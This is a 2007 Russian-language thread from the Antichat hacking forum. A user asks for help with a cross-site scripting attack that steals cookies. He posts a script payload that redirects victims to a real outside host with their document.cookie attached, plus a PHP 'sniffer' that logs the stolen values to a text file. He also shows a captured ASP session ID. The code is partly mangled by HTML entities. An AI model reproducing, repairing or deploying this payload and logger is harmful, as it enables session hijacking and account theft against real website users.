ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Нужна помощь. Видать в запросе...
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Нужна помощь. Видать в запросе...
  #1  
Старый 04.03.2007, 15:37
Аватар для int15
int15
Новичок
Регистрация: 28.12.2006
Сообщений: 6
Провел на форуме:
6362

Репутация: 0
Cool Нужна помощь. Видать в запросе...
Народ, помогайте, запарился чета)
Вот вобщем, нашёл место куда сувать XSS.
Кидаю вот что:
PHP код:
<script&qtdocument.location.href="http://www.humora.net.ru/Files/sniff.php"document.cookie; </script&qt
Где sniff.php содержит такие строки:
PHP код:
<?
 $f fopen("snif.txt""a");
 fwrite($f$REQUEST_URI);
 fclose($f);
 print("OK");
?&qt;
И в итоге, чтобы записать мои куки, снифером, в snif.txt, меня перебрасывает на страницу:
http://www.humora.net.ru/Files/sniff.phpASPSESSIONIDQSDSCRCT=DDPADKADEMNCFJPKCHBA IEAD
где
ASPSESSIONIDQSDSCRCT=DDPADKADEMNCFJPKCHBAIEAD - это и есть document.cookie
Подскажите че нетак, плиз, а то не знаю уже че за фигня
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Нужна помощь! Black_Death Болталка 7 11.12.2004 16:03
Нужна помощь... Чаты 2 24.02.2003 02:17
Нужна помощь Амир Чаты 0 04.09.2002 11:21



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ